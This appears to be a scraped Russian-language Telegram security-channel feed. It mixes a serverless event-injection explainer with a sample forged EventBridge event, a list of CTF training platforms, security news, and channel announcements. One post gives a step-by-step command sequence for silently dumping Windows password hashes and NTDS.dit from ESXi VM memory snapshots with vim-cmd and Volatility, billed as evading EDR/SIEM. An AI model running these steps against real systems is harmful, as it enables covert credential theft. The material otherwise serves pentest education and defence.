Fsecurity | HH

🔗 ServerMess, или почему serverless — это тихий ужас AppSec-а

ПРЕДУПРЕЖДЕНИЕ ТЕМА УРОВНЯ /b/

Всем снова привет! Давно я не выносил вам мозг про уязвимости, но, сами понимаете, молчать больше нельзя. Сегодня поговорим о ServerMess — как serverless-архитектуры тихо и незаметно ломают безопасность. 🤯 Что за "ServerMess" вообще такой? Это такой скрытый хаос, который случается, когда разработчики на радостях пилят десятки Lambda-функций, Azure Functions и Cloud Functions и связывают их через event-driven подход. Сначала выглядит всё красиво: события летят, функции реагируют, разработчики довольны. Но потом наступает утро, и ты понимаешь, что у тебя под капотом полная жесть, а не архитектура. События запускают друг друга, вызывая функции, о которых уже никто не помнит, и весь этот цепной балаган уже никак не контролируется обычными инструментами безопасности. ❌ Что реально сломано (примеры которые я смог найти) Если интересно, то сделаю про OpenSource решения (Knative, OpenFaaS, Fission) 1️⃣ AWS Lambda + EventBridge Есть приложение, публикующее события вроде “OrderPlaced” через AWS EventBridge. Лямбды подписываются и радостно реагируют на это событие. Проблема в том, что EventBridge легко может стать открытым для публикации всем подряд. И вот уже злоумышленник с минимальными правами отправляет туда фейковое событие:

{
  "Source": "orders.service",
  "DetailType": "OrderPlaced",
  "Detail": "{ \"orderId\": \"an.mtv\", \"userEmail\": \"attacker@test.local\" }"
}

И понеслось, кто-то шлёт письма не тому, кто-то обновляет статистику фальшивыми заказами, а кто-то (если повезло хакеру) ещё и читает данные из базы. 2️⃣ Azure Functions через Event Grid В Azure разработчики любят триггеры через Event Grid. Проблема: часто это просто HTTP-вебхуки, которые случайно забывают закрыть ключами или хотя бы SAS-токенами. Злоумышленник спокойно отправляет фейковый запрос на публичную функцию, и вот уже кто-то получает нежелательные письма, а кто-то регистрирует тысячи новых пользователей. В общем, опасность тут настоящая. ❓ Почему классические средства защиты (DAST, SAST, WAF) в пролёте Инструменты привыкли видеть HTTP-трафик и понятные цепочки данных. А бессерверные приложения разбиты на микрокуски, связанные событиями через облачные очереди и сервисы, куда традиционные сканеры просто не дотягиваются. WAF вообще бесполезен, если атака идёт через внутренний канал событий типа SQS или Pub/Sub. 🔍 Как искать такой скрытый трэш - Включайте Distributed Tracing типа AWS X-Ray или Azure Application Insights, чтобы увидеть, кто и как вызывает ваши функции. - Используйте инфраструктурные сканеры (Prowler, Checkov, ScoutSuite), чтобы находить открытые топики и очереди. - Фаззинг событий: берёте свой скриптик и отправляете мутные payload’ы прямо в очереди, смотрите на реакцию ваших функций. 🌐 Как защищаться и спать спокойно - Каждой функции своя минимальная IAM-роль, никакой общей помойки с * правами. - Не доверяйте данным из событий по дефолту: строгая валидация схемы и событий. - Закрывайте триггеры аутентификацией и проверкой источника (хотя бы через HMAC или VPC Service Controls в GCP). - Настройте мониторинг аномалий в событиях. Если количество вызовов резко возросло — это повод проснуться ночью и проверить, не хакнули ли вас уже. 🌐 Заключение Serverless — это круто, пока не начинается бардак. Если вы строите свою инфраструктуру на Lambda, Azure или GCP Cloud Functions, то пора посмотреть на неё трезвыми глазами. Иначе в один прекрасный день она сама посмотрит на вас глазами удивлённого безопасника, которого только что взломали через тихий и незаметный Event Injection. Для ознакомления Безопасность serverless-приложений – ТЫК (Youtube) Всё, что вы хотели знать о бессерверных технологиях, но боялись спросить – ТЫК The Ten Most Critical Risks for Serverless Applications v1.0 – ТЫК Lock-down OpenFaaS for the public Internet – ТЫК #appsec

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈 Также идёт набор в 🎓 PFS Academy

🔗Ссылка: https://habr.com/ru/post/896580/

🔄 🚩 💻Список площадок для оттачивания навыков этичного хакинга, подойдет для тренировок CTF. 😉 Hack The Box

Windows, *nix машины для самостоятельного пентеста. Во free тарифе всегда доступно 20 машин. Обучение, академия, лабы и т.д. Есть огромное количество CTF заданий в различных категориях. Возможность сдать экзамены и получить сертификаты CBBH (Certified Bug Bounty Hunter), CPTS (Certified Penetration Testing Specialist), CWEE (Certified Web Exploitation Expert) и CDSA (Certified Defensive Security Analyst) 🙃

😉 TryHackMe

Аналог HackTheBox без CTF заданий. Академия в наличии, также присутствует free тариф 😁

😉 PortSwigger

Академия веб пентеста от создателей BurpSuite. Для сдачи экзамена необходима активная подписка на Burp Suite Professional, цена экзамена 99$ 😈

😉 CTFtime

Информацию почти обо всех прошедших и предстоящих CTF соревнованиях можно найти здесь

😉 HackerLab

Русскоязычная площадка 😎. Большое (300+) количество CTF задач в самых различных категориях (web, crypto, rev, pwn, osint и т.д.), в наличии Windows и Linux машины. Есть бесплатный тариф

😉 CryptoHack

Один из лучших ресурсов с задачами по криптографии. Нравится криптография ? Вам сюда, от азов до сложнейших задач

😉 Standoff365

Киберполигон от компании 😎 Positive Technologies. Это виртуальная инфраструктура с реалистичными копиями IT-систем из разных отраслей. Достаточно высокий порог вхождения. Ежегодно проводятся турниры, куда вы можете отобраться со своей командой

😉 TaipanByte CTF

Русскоязычная площадка от ребят из команды TaipanByte, большое кол-во тасков (80+) во всех основных категориях

😉 pwn.college

Образовательная платформа, позволяющая изучать и практиковать основные концепции кибербезопасности. Рассчитана на новичков

😉 Kontra

Appsec тренировки, LLM, owasp top10, owasp api top10, aws top10 и т.д.

😉 Linux Journey

Путешествие в мир Linux, основные команды, лабы, руководства

😉 OverTheWire Bandit

Игра из 34 уровней для изучения Linux

😉 Crackmes

Большое количество (~4000) крякми для изучения. Подойдет реверсерам

😉 Pwnable

Для любителей бинарной эксплуатации (PWN)

😉 Cyber-Ed

Русскоязычная площадка. One task of the month - выкладывают по 1ой CTF задаче в месяц, в этом году планируют 10 заданий в категориях: web, pwn, crypto, reverse, misc и т.д.

😉 Root Me

Огромное (500+) кол-во заданий в самых разных категориях

😉 picoCTF

Площадка с CTF заданиями начального уровня, почти на все задания можно найти райтапы

😉 Exploit Education

ВМ Phoenix для изучения уязвимостей, разработки эксплойтов, отладки программного обеспечения и общих проблем кибербезопасности Темы - Network programming, Stack overflows, Format string vulnerabilities, Heap overflows

😉 0xf.at

Парольные загадки (ребусы), например, пароль это сумма чисел от 1 до 446, соответственно надо написать простенькую автоматизацию и ввести в поле ввода

😉 Hacker Test

Простенький хакер квест состоящий из 20 уровней

⚠️ P.S. Если вы знаете подобные площадки, лично проверяли и они заслуживают внимания, пишите пожалуйста в бота обратной связи - @wh_feedback_bot #htb #crackmes #bandit #hacking #ctf #ethical ✈️ Whitehat Lab

🔗Ссылка: https://github.com/Karmaz95/Snake_Apple

Фанатам hashcat * Phatcrack - тот же кот в сапогах только с веб мордой и в Docker Link

Взлом собаки Роботы-пылесосы и слитые с них фотографии мы с вами уже однажды обсудили, а теперь очередь дошла до более инновационных сожителей в наших квартирах. Да, роботизированная замена лучших друзей человеков – не самая популярная и распространенная игрушка в нашем регионе, но я думаю, что это вопрос времени. Одни исследователи безопасности тут выяснили, что через робопсов (Unitree Go1) уже начали следить за их владельцами. При чем в этот раз не через взлом хранилища распознанных фотографий, а через подключение напрямую к камерам собаки в режиме реального времени. И доступ к камерам, насколько я понимаю, далеко не предел возможностей. Причем это не симулированный взлом на тренировочном полигоне – атаке подверглись порядка 2 000 робопсов по всему миру. Производитель пока не выпускал на эту тему пресс-релизов, поэтому даже не ясно, чинят ли они эту дыру. В общем, когда надумаете покупать себе искусственную собаку или дворецкого-киборга, знайте о том, что все их органы познания внешнего мира могут принадлежать не только вам, но и кому-угодно в сети. Собственно, это справедливо и для всех остальных устройств с камерами и микрофонами в вашем доме. Вот так и живем. ⚡ Пакет Безопасности | 💬 Чат 🛍 Другие каналы

🔗Ссылка: https://habr.com/ru/articles/893938/

Volatility + ESXi = Бесшумный дамп хэшей и NTDS 😈 Когда дело касается извлечения учетных данных, большинство атак сосредоточено на виндовых машинах – Mimikatz, DCSync, Pass-the-Hash. Но что, если спуститься ниже? Если ты контролируешь гипервизор, тебе даже не нужно ломать саму ОС – ты просто забираешь память ВМ целиком и извлекаешь из нее хэши, NTDS и другие артефакты без триггеров EDR/SIEM 🐸 Ниже описал прикольный вектор через Volatility и консоль VMware для бесшумного дампа кредов с серверов 🪨 Поиск информации о виртуальных машинах на сервере ❗️

vim-cmd vmsvc/getallvms
vim-cmd vmsvc/power.getstate <VMID>
vim-cmd vmsvc/get.snapshotinfo <VMID>

Создаем snapshot системы с обязательным извлечением *.vmem файла 🔫

vim-cmd vmsvc/snapshot.create <VMID> <snapshotname> <description> true true
ls -ll /vmfs/volumes/
ls -ll /vmfs/volumes/<UUID>/<snapshotname>

В /vmfs/volumes/<UUID>/<snapshotname> будет файл с расширением *.vmem который можно будет проанализировать при помощи Volatility 😆

/tmp/v -f "/vmfs/volumes/<UUID>/<snapshotname>/file.vmem" imageinfo

/tmp/v -f "/vmfs/volumes/<UUID>/<snapshotname>/file.vmem" --profile="WindowsVersion" hashdump

/tmp/v -f "/vmfs/volumes/<UUID>/<snapshotname>/file.vmem" --profile="WindowsVersion" filescan | grep ntds.dit 

/tmp/v -f "/vmfs/volumes/<UUID>/<snapshotname>/file.vmem" --profile="WindowsVersion" dumpfiles -Q <ntds memaddress> --name file -D /tmp/ntds.dit

А самый угар в том что на уровне ОС самой виртуалки и никакими антивирусами это не выловить, поможет только мониторинг активности и грамотная настройка Access List-ов 😏 P.S Автор против блэчеров и активно выступает за согласованние действий с владельцами систем 🧢 s0ld13r

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈 Также идёт набор в 🎓 PFS Academy

🔗Ссылка: https://www.securitylab.ru/news/557921.php

🔗Ссылка: https://www.securitylab.ru/news/557925.php

🔗Ссылка: https://www.securitylab.ru/news/557869.php

🔗Ссылка: https://habr.com/ru/post/660169/

Всем привет! Если этот пост опубликуется, значит канал разблокировали🎉 Хотел сказать огромное спасибо всем кто помог с решением вопроса и просто приходил в личку со словами поддержки🙏

🔗Ссылка: https://www.securitylab.ru/news/557855.php

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈 Также идёт набор в 🎓 PFS Academy

Facebook SMS-based Two-Factor Authentication Bypass * WriteUP * August 3, 2024: Fixed

🔨 Доброго времени суток друзья! Как вы уже знаете, мой предыдущий канал был заблокирован. Получено уведомление:

Your community Pentest HaT was blocked for violations of the Telegram Terms of Service (illegal goods) based on user reports confirmed by our moderators.

К сожалению, никаких подробностей мне не предоставили — что именно считается "illegal goods", осталось загадкой. Судя по всему, кто-то решил накидать абуз, и канал забанили без разбирательства. Вот что написано в ToS:

▪️Не использовать мессенджер для рассылки спама или обмана пользователей; ▪️Не призывать к насилию в публичных каналах, ботах и других общедоступных чатах в Telegram; ▪️Не размещать незаконный порнографический контент в каналах, ботах и других общедоступных чатах в Telegram. ▪️Не заниматься деятельностью, которая признана незаконной в большинстве стран. Это включает жестокое обращение с детьми, продажу или предложение незаконных товаров и услуг (наркотики, оружие, поддельные документы) и т.д.

Понятия не имею, что из этого я мог нарушить Конечно приятного мало и я слегка расстроился, но руки не опустились и было принято решение создать новый канал 🎩 Whitehat Lab Все важные материалы перенесены, а также сохранена работа ботов. Планирую продолжить публиковать обзоры полезных Red Team инструментов, свежих CVE, PoC-эксплоитов и других полезных материалов из мира кибербезопасности. Буду признателен всем тем кто подпишется Репост и распространение информации приветствуется 👍 ✈️ Whitehat Lab

🔗Ссылка: https://vulhub.org/